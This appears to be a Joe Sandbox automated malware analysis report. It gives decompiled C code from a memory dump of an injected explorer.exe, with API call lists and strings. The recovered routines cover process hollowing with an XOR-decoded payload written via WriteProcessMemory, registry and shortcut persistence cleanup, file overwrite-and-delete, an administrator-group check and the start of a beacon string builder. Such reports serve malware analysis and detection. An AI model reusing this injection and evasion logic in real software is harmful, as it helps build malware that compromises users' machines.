0x00775222
0x00775211
0x00775225
0x00775229
0x00775233
0x00775233
0x0077523a
0x00775252
0x0077526c
0x00775275
0x0077527e
0x00775288
0x007752b5
0x007752b7
0x0077528a
0x0077529a
0x007752ac
0x0077529c
0x007752a4
0x007752a4
0x0077529a
0x007752be
0x007752c8
0x007752c8
0x00000000
0x0077523a
0x00775182
0x00775185
0x0077518c
0x0077519a
0x0077519d
0x007751a0
0x007751a0
0x007751a0
0x007751a0
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00775040
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0077508F
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 007750F5
MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 0077510D

Part of subcall function 007713B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007713CD

Part of subcall function 00774EF0: ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 00774F3A
Part of subcall function 00774EF0: ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 00774F69
Part of subcall function 00774EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 00774FBC
Part of subcall function 00774EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 00774FED

GetThreadContext.KERNEL32(?,00010007), ref: 00775209
CloseHandle.KERNEL32(?), ref: 007752C8

Part of subcall function 00774DE0: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 00774E09
Part of subcall function 00774DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774E39
Part of subcall function 00774DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774E5A
Part of subcall function 00774DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774E7E

VirtualProtectEx.KERNEL32(?,00000000,0000029B,00000040,?), ref: 00775252
WriteProcessMemory.KERNEL32(?,00000000,?,0000029B,?), ref: 0077526C

Part of subcall function 00771828: VirtualFree.KERNEL32(?,00000000,00008000,?,?,00776A2F), ref: 0077183A

ResumeThread.KERNEL32(?), ref: 0077527E
WaitForSingleObject.KERNEL32(?,00000000), ref: 00775292
GetExitCodeProcess.KERNEL32(?,?), ref: 007752A4
CloseHandle.KERNEL32(?), ref: 007752BE

Strings

D, xrefs: 0077506E
_section, xrefs: 007750B3

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00775026, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 212
threadprocessfile

C-Code - Quality: 98%

			E00775026(CHAR* _a4, struct HINSTANCE__* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
				long _v8;
				void* _v12;
				void* _v16;
				long _v20;
				long _v24;
				void* _v28;
				signed int _v32;
				long _v36;
				long _v40;
				char _v44;
				struct _STARTUPINFOA _v112;
				void* _v124;
				struct _CONTEXT _v332;
				char _v353;
				signed int _t107;
				void* _t144;

				_v8 = 0xffffffff;
				if(_a8 == 0) {
					_a8 = GetModuleHandleA(0);
				}
				if(_a16 != 0 && _a20 == 0xffffffff) {
					_a20 = E007712DC(_a16) + 1;
				}
				E00771258( &_v112, 0x44);
				_v112.cb = 0x44;
				_t107 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v112,  &(_v332.ExtendedRegisters));
				asm("sbb eax, eax");
				_t109 =  ~( ~_t107);
				if( ~( ~_t107) == 0) {
					L23:
					return _v8;
				} else {
					E00771164(E007710B4(_t109, 0x44),  &_v353);
					E0077133C( &_v353, "_section");
					_v24 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x3c)) + _a8 + 0x50));
					_v12 = CreateFileMappingA(0xffffffff, 0, 4, 0, _v24 + 8 + _a20,  &_v353);
					_v16 = MapViewOfFile(_v12, 0xf001f, 0, 0, 0);
					E007712B8(_v16, _v24, _a8);
					 *((intOrPtr*)(_v16 + _v24)) = _a12 - _a8;
					 *((intOrPtr*)(_v16 + _v24 + 4)) = _a20;
					E007712B8(_v16 + _v24 + 8, _a20, _a16);
					_v24 = 0x29b;
					E007713B4( &_v28, _v24 + 0x11);
					E007712B8(_v28, _v24, 0x77a2ac);
					_t144 = _v24 - 1;
					if(_t144 < 0) {
						L10:
						_v20 = E007712DC( &_v353) + 1;
						E007712B8(_v28 + _v24, _v20,  &_v353);
						_v24 = _v24 + _v20;
						_v40 = 0;
						_v40 = E00774EF0(_v332.ExtendedRegisters.hProcess, _t229);
						if(_v40 == 0) {
							E00771258( &_v332, 0xcc);
							_v332.ContextFlags = 0x10007;
							if(GetThreadContext(_v124,  &_v332) != 0 && _v332.Eax != 0) {
								_v40 = _v332.Eax;
							}
						}
						_t233 = _v40;
						if(_v40 == 0) {
							_v40 = E00774DE0(_v332.ExtendedRegisters.hProcess, _t233);
						}
						if(_v40 != 0) {
							VirtualProtectEx(_v332.ExtendedRegisters.hProcess, _v40, _v24, 0x40,  &_v36);
							WriteProcessMemory(_v332.ExtendedRegisters.hProcess, _v40, _v28, _v24,  &_v20);
							E00771828(_v28);
							ResumeThread(_v124);
							if(_a24 == 0) {
								__eflags = 0;
								_v8 = 0;
							} else {
								if(WaitForSingleObject(_v332.ExtendedRegisters.hProcess, _a24) != 0) {
									_v8 = 0xfffffffe;
								} else {
									GetExitCodeProcess(_v332.ExtendedRegisters.hProcess,  &_v8);
								}
							}
							CloseHandle(_v124);
							CloseHandle(_v332.ExtendedRegisters);
						}
						goto L23;
					}
					_v44 = _t144 + 1;
					_v32 = 0;
					do {
						 *(_v28 + _v32) =  *(_v28 + _v32) ^ 0x000000e4 + _v32 * 0xffffff9b;
						_v32 = _v32 + 1;
						_t55 =  &_v44;
						 *_t55 = _v44 - 1;
						_t229 =  *_t55;
					} while ( *_t55 != 0);
					goto L10;
				}
			}

0x00775031
0x0077503c
0x00775046
0x00775046
0x0077504d
0x0077505e
0x0077505e
0x00775069
0x0077506e
0x0077508f
0x00775097
0x00775099
0x0077509d
0x007752ce
0x007752d4
0x007750a3
0x007750ae
0x007750bf
0x007750d9
0x007750fb
0x00775113
0x0077511f
0x00775130
0x0077513e
0x0077514f
0x00775154
0x00775164
0x00775174
0x0077517c
0x0077517f
0x007751a5
0x007751b1
0x007751c3
0x007751cb
0x007751d0
0x007751db
0x007751e2
0x007751ef
0x007751f4
0x00775211
0x00775222
0x00775222
0x00775211
0x00775225
0x00775229
0x00775233
0x00775233
0x0077523a
0x00775252
0x0077526c
0x00775275
0x0077527e
0x00775288
0x007752b5
0x007752b7
0x0077528a
0x0077529a
0x007752ac
0x0077529c
0x007752a4
0x007752a4
0x0077529a
0x007752be
0x007752c8
0x007752c8
0x00000000
0x0077523a
0x00775182
0x00775185
0x0077518c
0x0077519a
0x0077519d
0x007751a0
0x007751a0
0x007751a0
0x007751a0
0x00000000
0x0077518c

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00775040
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0077508F
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 007750F5
MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 0077510D

Part of subcall function 007713B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 007713CD

Part of subcall function 00774EF0: ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 00774F3A
Part of subcall function 00774EF0: ReadProcessMemory.KERNEL32(?,00000000,?,00001000,?), ref: 00774F69
Part of subcall function 00774EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 00774FBC
Part of subcall function 00774EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 00774FED

GetThreadContext.KERNEL32(?,00010007), ref: 00775209
CloseHandle.KERNEL32(?), ref: 007752C8

Part of subcall function 00774DE0: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 00774E09
Part of subcall function 00774DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774E39
Part of subcall function 00774DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774E5A
Part of subcall function 00774DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00774E7E

VirtualProtectEx.KERNEL32(?,00000000,0000029B,00000040,?), ref: 00775252
WriteProcessMemory.KERNEL32(?,00000000,?,0000029B,?), ref: 0077526C

Part of subcall function 00771828: VirtualFree.KERNEL32(?,00000000,00008000,?,?,00776A2F), ref: 0077183A

ResumeThread.KERNEL32(?), ref: 0077527E
WaitForSingleObject.KERNEL32(?,00000000), ref: 00775292
GetExitCodeProcess.KERNEL32(?,?), ref: 007752A4
CloseHandle.KERNEL32(?), ref: 007752BE

Strings

D, xrefs: 0077506E
_section, xrefs: 007750B3

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007780C0, Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100
window

C-Code - Quality: 90%

			E007780C0(intOrPtr __eax) {
				intOrPtr _v8;
				char _v265;
				void* _t13;
				void* _t15;
				char* _t27;
				intOrPtr _t31;
				void* _t33;
				void* _t35;
				signed int _t37;
				signed int _t39;
				char* _t42;
				struct HWND__* _t48;
				intOrPtr _t50;
				char* _t60;
				char* _t62;
				void* _t63;

				_v8 = __eax;
				if( *0x77a038 != 0) {
					_t50 =  *0x77a038; // 0x0
					 *0x77b4f8(_t50);
				}
				 *0x77c24c = CreateEventA(0, 0xffffffff, 0, 0);
				 *0x77a29c = 0xffffffff;
				_t13 =  *0x77c24c; // 0x0
				WaitForSingleObject(_t13, 0xffffffff);
				_t15 =  *0x77c24c; // 0x0
				CloseHandle(_t15);
				E00771308( &_v265, 0x77b518);
				 *((char*)(_t63 + E007712DC(0x77b518) - 0x109)) = 0;
				E0077133C( &_v265, ".lnk");
				E0077471C( &_v265, 0, 0);
				E0077471C(0x77b518, 0x7530, 0xffffffff);
				if( *0x77a574 != 0) {
					_t48 =  *0x77a574; // 0x6024a
					SendMessageA(_t48, 0x10, 0, 0);
				}
				if( *0x77a034 == 0) {
					if(_v8 == 0) {
						_t27 =  *0x77a260; // 0x7721a4
						SHDeleteKeyA(0x80000001, _t27);
					} else {
						_t60 =  *0x77a260; // 0x7721a4
						E00778064(0x80000001, 0x77b752, _t60);
					}
					E00774A1C(0x80000001,  &_v265);
				} else {
					if(_v8 == 0) {
						_t42 =  *0x77a260; // 0x7721a4
						SHDeleteKeyA(0x80000002, _t42);
					} else {
						_t62 =  *0x77a260; // 0x7721a4
						E00778064(0x80000002, 0x77b752, _t62);
					}
					E00774A1C(0x80000002,  &_v265);
				}
				_t31 =  *0x77b510; // 0x790000
				E00771828(_t31);
				_t33 =  *0x77a054; // 0x230
				ReleaseMutex(_t33);
				_t35 =  *0x77a054; // 0x230
				CloseHandle(_t35);
				_t37 =  *0x77a2a0; // 0x0
				asm("sbb eax, eax");
				_t39 =  ~( ~_t37);
				if(_t39 == 0) {
					ExitProcess(0);
				}
				return _t39;
			}

0x007780c9
0x007780d3
0x007780d5
0x007780db
0x007780db
0x007780ef
0x007780f4
0x00778100
0x00778106
0x0077810c
0x00778112
0x00778123
0x00778132
0x00778146
0x00778158
0x0077816a
0x00778176
0x0077817e
0x00778184
0x00778184
0x00778191
0x007781d7
0x007781f0
0x007781fb
0x007781d9
0x007781de
0x007781e9
0x007781e9
0x0077820c
0x00778193
0x00778197
0x007781b0
0x007781bb
0x00778199
0x0077819e
0x007781a9
0x007781a9
0x007781cc
0x007781cc
0x00778211
0x00778216
0x0077821b
0x00778221
0x00778227
0x0077822d
0x00778233
0x0077823a
0x0077823c
0x00778240
0x00778244
0x00778244
0x0077824d

APIs

RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 007780DB
CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 007780E9
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00778106
CloseHandle.KERNEL32(00000000), ref: 00778112

Part of subcall function 0077471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 00774777
Part of subcall function 0077471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 00774786
Part of subcall function 0077471C: CloseHandle.KERNEL32(?), ref: 00774790

SendMessageA.USER32(0006024A,00000010,00000000,00000000), ref: 00778184
SHDeleteKeyA.SHLWAPI(80000002,007721A4), ref: 007781BB
ExitProcess.KERNEL32 ref: 00778244

Part of subcall function 00778064: RegOpenKeyExA.KERNELBASE(?,?,00000000,000F003F,?), ref: 0077808B
Part of subcall function 00778064: RegDeleteValueA.ADVAPI32(?,?), ref: 0077809D

SHDeleteKeyA.SHLWAPI(80000001,007721A4), ref: 007781FB

Part of subcall function 00774A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 00774A55

Part of subcall function 00771828: VirtualFree.KERNEL32(?,00000000,00008000,?,?,00776A2F), ref: 0077183A

ReleaseMutex.KERNEL32(00000230), ref: 00778221
CloseHandle.KERNEL32(00000230), ref: 0077822D

Strings

ewhasskz, xrefs: 00778199, 007781D9
C:\Program Files\Windows NT\hlpnu.exe, xrefs: 00778118, 00778128, 0077815D
.lnk, xrefs: 0077813A

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007780BE, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 80
window

C-Code - Quality: 90%

			E007780BE(intOrPtr __eax) {
				intOrPtr _v8;
				char _v265;
				void* _t13;
				void* _t15;
				char* _t27;
				intOrPtr _t31;
				void* _t33;
				void* _t35;
				signed int _t37;
				signed int _t39;
				char* _t42;
				struct HWND__* _t48;
				intOrPtr _t50;
				char* _t60;
				char* _t62;
				void* _t64;
				void* _t66;

				_t64 = _t66;
				_v8 = __eax;
				if( *0x77a038 != 0) {
					_t50 =  *0x77a038; // 0x0
					 *0x77b4f8(_t50);
				}
				 *0x77c24c = CreateEventA(0, 0xffffffff, 0, 0);
				 *0x77a29c = 0xffffffff;
				_t13 =  *0x77c24c; // 0x0
				WaitForSingleObject(_t13, 0xffffffff);
				_t15 =  *0x77c24c; // 0x0
				CloseHandle(_t15);
				E00771308( &_v265, 0x77b518);
				 *((char*)(_t64 + E007712DC(0x77b518) - 0x109)) = 0;
				E0077133C( &_v265, ".lnk");
				E0077471C( &_v265, 0, 0);
				E0077471C(0x77b518, 0x7530, 0xffffffff);
				if( *0x77a574 != 0) {
					_t48 =  *0x77a574; // 0x6024a
					SendMessageA(_t48, 0x10, 0, 0);
				}
				if( *0x77a034 == 0) {
					if(_v8 == 0) {
						_t27 =  *0x77a260; // 0x7721a4
						SHDeleteKeyA(0x80000001, _t27);
					} else {
						_t60 =  *0x77a260; // 0x7721a4
						E00778064(0x80000001, 0x77b752, _t60);
					}
					E00774A1C(0x80000001,  &_v265);
				} else {
					if(_v8 == 0) {
						_t42 =  *0x77a260; // 0x7721a4
						SHDeleteKeyA(0x80000002, _t42);
					} else {
						_t62 =  *0x77a260; // 0x7721a4
						E00778064(0x80000002, 0x77b752, _t62);
					}
					E00774A1C(0x80000002,  &_v265);
				}
				_t31 =  *0x77b510; // 0x790000
				E00771828(_t31);
				_t33 =  *0x77a054; // 0x230
				ReleaseMutex(_t33);
				_t35 =  *0x77a054; // 0x230
				CloseHandle(_t35);
				_t37 =  *0x77a2a0; // 0x0
				asm("sbb eax, eax");
				_t39 =  ~( ~_t37);
				if(_t39 == 0) {
					ExitProcess(0);
				}
				return _t39;
			}

0x007780c1
0x007780c9
0x007780d3
0x007780d5
0x007780db
0x007780db
0x007780ef
0x007780f4
0x00778100
0x00778106
0x0077810c
0x00778112
0x00778123
0x00778132
0x00778146
0x00778158
0x0077816a
0x00778176
0x0077817e
0x00778184
0x00778184
0x00778191
0x007781d7
0x007781f0
0x007781fb
0x007781d9
0x007781de
0x007781e9
0x007781e9
0x0077820c
0x00778193
0x00778197
0x007781b0
0x007781bb
0x00778199
0x0077819e
0x007781a9
0x007781a9
0x007781cc
0x007781cc
0x00778211
0x00778216
0x0077821b
0x00778221
0x00778227
0x0077822d
0x00778233
0x0077823a
0x0077823c
0x00778240
0x00778244
0x00778244
0x0077824d

APIs

RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 007780DB
CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 007780E9
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00778106
CloseHandle.KERNEL32(00000000), ref: 00778112

Part of subcall function 0077471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 00774777
Part of subcall function 0077471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 00774786
Part of subcall function 0077471C: CloseHandle.KERNEL32(?), ref: 00774790

SendMessageA.USER32(0006024A,00000010,00000000,00000000), ref: 00778184
ExitProcess.KERNEL32 ref: 00778244

Part of subcall function 00778064: RegOpenKeyExA.KERNELBASE(?,?,00000000,000F003F,?), ref: 0077808B
Part of subcall function 00778064: RegDeleteValueA.ADVAPI32(?,?), ref: 0077809D

SHDeleteKeyA.SHLWAPI(80000002,007721A4), ref: 007781BB
SHDeleteKeyA.SHLWAPI(80000001,007721A4), ref: 007781FB

Part of subcall function 00774A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 00774A55

Part of subcall function 00771828: VirtualFree.KERNEL32(?,00000000,00008000,?,?,00776A2F), ref: 0077183A

ReleaseMutex.KERNEL32(00000230), ref: 00778221
CloseHandle.KERNEL32(00000230), ref: 0077822D

Strings

ewhasskz, xrefs: 00778199
C:\Program Files\Windows NT\hlpnu.exe, xrefs: 00778118, 00778128, 0077815D
.lnk, xrefs: 0077813A

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 00774608, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 88
sleepfile

C-Code - Quality: 96%

			E00774608(intOrPtr* _a4) {
				int _v8;
				CHAR* _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				long _v32;
				char _v36;
				void _v548;
				signed int _t42;
				char _t58;

				_v8 = 0;
				_v16 =  *_a4;
				_v12 = _a4 + 4;
				while(1) {
					_t42 = E00773988(_v12);
					asm("sbb eax, eax");
					if( ~( ~_t42) == 0) {
						break;
					}
					_v20 = CreateFileA(_v12, 0xc0000000, 0, 0, 3, 0x20000080, 0);
					if(_v20 == 0xffffffff) {
						L8:
						_v8 = DeleteFileA(_v12);
						if(_v8 != 0 || _v16 == 0) {
							L13:
							E00771440(_a4);
							return _v8;
						} else {
							if(_v16 <= 0x64) {
								Sleep(_v16);
								_v16 = 0;
							} else {
								Sleep(0x64);
								_v16 = _v16 - 0x64;
							}
							continue;
						}
					}
					_v24 = GetFileSize(_v20, 0);
					_t58 = (_v24 >> 9) + 1;
					if(_t58 <= 0) {
						L7:
						FlushFileBuffers(_v20);
						CloseHandle(_v20);
						goto L8;
					}
					_v36 = _t58;
					_v28 = 1;
					do {
						WriteFile(_v20,  &_v548, 0x200,  &_v32, 0);
						_v28 = _v28 + 1;
						_t21 =  &_v36;
						 *_t21 = _v36 - 1;
					} while ( *_t21 != 0);
					goto L7;
				}
				_v8 = 0xffffffff;
				goto L13;
			}

0x00774613
0x0077461b
0x00774624
0x00774627
0x0077462a
0x00774631
0x00774637
0x00000000
0x00000000
0x00774661
0x00774668
0x007746c6
0x007746d0
0x007746d7
0x0077470a
0x0077470d
0x00774718
0x007746df
0x007746e3
0x007746fa
0x00774702
0x007746e5
0x007746e7
0x007746ed
0x007746ed
0x00000000
0x007746e3
0x007746d7
0x00774676
0x0077467f
0x00774682
0x007746b2
0x007746b6
0x007746c0
0x00000000
0x007746c0
0x00774684
0x00774687
0x0077468e
0x007746a4
0x007746aa
0x007746ad
0x007746ad
0x007746ad
0x00000000
0x0077468e
0x00774639
0x00000000

APIs

Part of subcall function 00773988: FindFirstFileA.KERNEL32(?,?), ref: 007739A4
Part of subcall function 00773988: FindClose.KERNEL32(000000FF), ref: 007739BF

CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,20000080,00000000), ref: 0077465B
GetFileSize.KERNEL32(000000FF,00000000), ref: 00774670
WriteFile.KERNEL32(000000FF,?,00000200,?,00000000), ref: 007746A4
FlushFileBuffers.KERNEL32(000000FF), ref: 007746B6
CloseHandle.KERNEL32(000000FF), ref: 007746C0
DeleteFileA.KERNEL32(?), ref: 007746CA
Sleep.KERNEL32(00000064), ref: 007746E7
Sleep.KERNEL32(00000064), ref: 007746FA

Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454

Strings

d, xrefs: 007746ED

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007741CC, Relevance: 15.1, APIs: 10, Instructions: 88
thread

C-Code - Quality: 100%

			E007741CC() {
				char _v5;
				void* _v12;
				void* _v16;
				long _v20;
				void* _v24;
				signed int _v28;
				int _v32;
				char _v36;
				void* _t51;

				_v5 = 0;
				_v32 = OpenThreadToken(GetCurrentThread(), 8, 0xffffffff,  &_v12);
				if(_v32 == 0 && GetLastError() == 0x3f0) {
					_v32 = OpenProcessToken(GetCurrentProcess(), 8,  &_v12);
				}
				if(_v32 != 0) {
					_v16 = E007713DC(0x400);
					_v32 = GetTokenInformation(_v12, 2, _v16, 0x400,  &_v20);
					CloseHandle(_v12);
					if(_v32 != 0) {
						AllocateAndInitializeSid(0x77a2a4, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24);
						_t51 =  *_v16 - 1;
						if(_t51 >= 0) {
							_v36 = _t51 + 1;
							_v28 = 0;
							while(EqualSid(_v24,  *(_v16 + 4 + _v28 * 8)) == 0) {
								_v28 = _v28 + 1;
								_t28 =  &_v36;
								 *_t28 = _v36 - 1;
								if( *_t28 != 0) {
									continue;
								}
								goto L10;
							}
							_v5 = 1;
						}
						L10:
						FreeSid(_v24);
					}
					E00771440(_v16);
				}
				return _v5;
			}

0x007741d2
0x007741eb
0x007741f2
0x00774214
0x00774214
0x0077421b
0x0077422b
0x00774247
0x0077424e
0x00774258
0x00774278
0x00774283
0x00774286
0x00774289
0x0077428c
0x00774293
0x007742b2
0x007742b5
0x007742b5
0x007742b8
0x00000000
0x00000000
0x00000000
0x007742b8
0x007742ac
0x007742ac
0x007742ba
0x007742be
0x007742be
0x007742c7
0x007742c7
0x007742d2

APIs

GetCurrentThread.KERNEL32 ref: 007741DE
OpenThreadToken.ADVAPI32(00000000), ref: 007741E5
GetLastError.KERNEL32 ref: 007741F4
GetCurrentProcess.KERNEL32 ref: 00774207
OpenProcessToken.ADVAPI32(00000000), ref: 0077420E

Part of subcall function 007713DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007713EB
Part of subcall function 007713DC: RtlAllocateHeap.NTDLL(00000000), ref: 007713F2

GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00774241
CloseHandle.KERNEL32(?), ref: 0077424E
AllocateAndInitializeSid.ADVAPI32(0077A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00774278
EqualSid.ADVAPI32(?,?), ref: 007742A2
FreeSid.ADVAPI32(?), ref: 007742BE

Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007741C8, Relevance: 15.1, APIs: 10, Instructions: 87
thread

C-Code - Quality: 100%

			E007741C8(intOrPtr* __eax) {
				char _v5;
				void* _v12;
				void* _v16;
				long _v20;
				void* _v24;
				signed int _v28;
				int _v32;
				char _v36;
				void* _t52;

				 *__eax =  *__eax + __eax;
				_v5 = 0;
				_v32 = OpenThreadToken(GetCurrentThread(), 8, 0xffffffff,  &_v12);
				if(_v32 == 0 && GetLastError() == 0x3f0) {
					_v32 = OpenProcessToken(GetCurrentProcess(), 8,  &_v12);
				}
				if(_v32 != 0) {
					_v16 = E007713DC(0x400);
					_v32 = GetTokenInformation(_v12, 2, _v16, 0x400,  &_v20);
					CloseHandle(_v12);
					if(_v32 != 0) {
						AllocateAndInitializeSid(0x77a2a4, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24);
						_t52 =  *_v16 - 1;
						if(_t52 >= 0) {
							_v36 = _t52 + 1;
							_v28 = 0;
							while(EqualSid(_v24,  *(_v16 + 4 + _v28 * 8)) == 0) {
								_v28 = _v28 + 1;
								_t28 =  &_v36;
								 *_t28 = _v36 - 1;
								if( *_t28 != 0) {
									continue;
								}
								goto L11;
							}
							_v5 = 1;
						}
						L11:
						FreeSid(_v24);
					}
					E00771440(_v16);
				}
				return _v5;
			}

0x007741ca
0x007741d2
0x007741eb
0x007741f2
0x00774214
0x00774214
0x0077421b
0x0077422b
0x00774247
0x0077424e
0x00774258
0x00774278
0x00774283
0x00774286
0x00774289
0x0077428c
0x00774293
0x007742b2
0x007742b5
0x007742b5
0x007742b8
0x00000000
0x00000000
0x00000000
0x007742b8
0x007742ac
0x007742ac
0x007742ba
0x007742be
0x007742be
0x007742c7
0x007742c7
0x007742d2

APIs

GetCurrentThread.KERNEL32 ref: 007741DE
OpenThreadToken.ADVAPI32(00000000), ref: 007741E5
GetLastError.KERNEL32 ref: 007741F4
GetCurrentProcess.KERNEL32 ref: 00774207
OpenProcessToken.ADVAPI32(00000000), ref: 0077420E

Part of subcall function 007713DC: GetProcessHeap.KERNEL32(00000000,?), ref: 007713EB
Part of subcall function 007713DC: RtlAllocateHeap.NTDLL(00000000), ref: 007713F2

GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00774241
CloseHandle.KERNEL32(?), ref: 0077424E
AllocateAndInitializeSid.ADVAPI32(0077A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00774278
EqualSid.ADVAPI32(?,?), ref: 007742A2
FreeSid.ADVAPI32(?), ref: 007742BE

Part of subcall function 00771440: GetProcessHeap.KERNEL32(00000000,?), ref: 0077144D
Part of subcall function 00771440: HeapFree.KERNEL32(00000000), ref: 00771454

Memory Dump Source

Source File: 00000001.00000002.16766566742.00770000.00000040.sdmp, Offset: 00770000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_770000_explorer.jbxd

Function 007784A4, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 335
sleepthread

C-Code - Quality: 98%

			E007784A4() {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				long _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v156;
				char _v4253;
				char _v4382;
				char _v4424;
				char _v4428;
				intOrPtr _t119;
				intOrPtr _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr _t144;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t157;
				intOrPtr _t165;
				intOrPtr _t170;
				intOrPtr _t174;
				intOrPtr _t179;
				intOrPtr _t187;
				void* _t195;
				intOrPtr _t198;
				signed int _t199;
				char _t202;
				intOrPtr _t205;
				signed int _t208;
				intOrPtr _t220;
				intOrPtr _t228;
				char _t236;
				intOrPtr _t269;
				char _t276;
				intOrPtr _t279;
				intOrPtr _t283;
				intOrPtr _t289;
				intOrPtr* _t290;
				intOrPtr _t291;
				intOrPtr _t292;
				void* _t300;
				void* _t301;
				void* _t317;

				_v68 = _t119;
				_v40 = E007713DC(0x20000);
				_v60 = 0;
				_v64 = 0;
				_v4382 = 0;
				if( *0x77b77c == 0) {
					_t276 =  *0x77c355; // 0x0
					_v4428 = _t276;
					E00771308( &_v4424, 0x77c384);
					while(1) {
						_t281 =  &_v4428;
						_t279 =  *0x77a194; // 0x771e9c
						_v12 = E00775AE8(_t279,  &_v4428, 0);
						if(_v12 != 0) {
							goto L4;
						}
						Sleep(0x4e20);
					}
					while(1) {
						L4:
						_v48 = 0;
						E007764BC( &_v156, 0x32, __eflags);
						_t283 =  *0x77a198; // 0x771eac
						E00771308(_v40, _t283);
						E0077133C(_v40, "1530474054");
						_t131 =  *0x77a19c; // 0x771eb4
						E0077133C(_v40, _t131);
						_t135 =  *0x77b77c; // 0x0
						E00771864(_t135,  &_v4253);
						E0077133C(_v40,  &_v4253);
						_t140 =  *0x77a0bc; // 0x771c84
						E0077133C(_v40, _t140);
						_t144 =  *0x77c380; // 0x0
						E00771864(_t144,  &_v4253);
						E0077133C(_v40,  &_v4253);
						_t149 =  *0x77a0c0; // 0x771c8c
						E0077133C(_v40, _t149);
